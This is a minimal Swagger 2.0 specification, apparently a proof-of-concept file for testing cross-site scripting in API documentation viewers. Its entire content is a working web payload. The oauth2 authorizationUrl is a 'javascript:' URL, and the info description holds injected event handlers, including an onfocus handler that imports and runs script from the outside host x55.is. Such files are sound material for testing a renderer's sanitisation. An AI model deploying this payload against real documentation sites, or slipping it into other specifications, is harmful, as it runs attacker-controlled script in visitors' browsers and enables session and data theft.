swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert(document.domain)//
info:
  version: "1.0.0"
  title: XSS img test
  description: onload="alert(1)" <a href=//x55.is autofocus onfocus=import(href)>
paths:
  /:
    get:
      responses:
        200:
          description: Successful response
